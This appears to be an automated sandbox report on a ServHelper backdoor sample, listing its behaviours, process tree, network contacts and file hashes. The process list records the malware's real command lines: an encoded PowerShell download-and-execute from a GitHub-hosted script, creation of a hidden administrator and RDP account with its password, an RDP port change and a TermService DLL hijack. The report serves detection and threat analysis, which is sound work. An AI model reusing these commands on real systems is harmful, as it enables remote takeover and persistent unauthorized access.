Malware Analysis Report

2024-10-23 17:53

Sample ID 210721-181y71wc52
Target ViJoy.bin
SHA256 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
Tags
servhelper backdoor bootkit discovery exploit persistence trojan upx
score
10/10

Analysis Overview

Threat Level: Known bad

The file ViJoy.bin was found to be: Known bad.

Malicious Activity Summary

ServHelper

Grants admin privileges

Possible privilege escalation attempt

Executes dropped EXE

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Modifies file permissions

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Script User-Agent

Modifies registry key

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Runs net.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-21 08:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-21 08:36

Reported

2021-07-21 08:39

Platform

win7v20210408

Max time kernel

135s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_425142e1-ff03-49e3-8c93-1c568bbed4c1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f0a89b75-84c4-46ec-8801-e598bbb7385f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f2680bf9-28e9-43e0-bd25-d5f6b7de7a4a C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0a9042e3-638b-4e58-b33a-596aaa9c2157 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9dd782a2-26fd-4b13-9482-96d6587e7e33 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b45ab286-01c7-430a-9385-2136afd79a6d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4032a6d-88a9-474f-9976-9b79ad6b05ef C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_28ba8299-4f98-4df6-a877-32c290c82849 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_499386d8-9573-4adc-b439-294e8eece9ea C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XEZ6J1XERCPNDTVB1U7P.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_09f03cb1-a0bf-4087-8e2c-ef7993cfca7d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b104d4dc-9fc7-4b5d-ad8f-ac019f392154 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0d795e91c7ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1440 wrote to memory of 324 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 324 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 324 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 324 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 324 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1276 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1276 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1276 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 324 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 324 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 324 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 324 wrote to memory of 860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp" "c:\Users\Admin\AppData\Local\Temp\onrvk3o1\CSC85EF2F55F5C9461DAB91D8D18757A.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc eZHAecbZ /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc eZHAecbZ /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc eZHAecbZ /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc eZHAecbZ

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc eZHAecbZ

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc eZHAecbZ

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 platform.wondershare.com udp
N/A 47.91.67.36:80 platform.wondershare.com tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.109.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

\Users\Admin\AppData\Roaming\Templers\exe1.exe

MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

\Users\Admin\AppData\Roaming\Templers\exe2.exe

MD5 c9622e294a0f3c6c4dfcf716cd2e6692
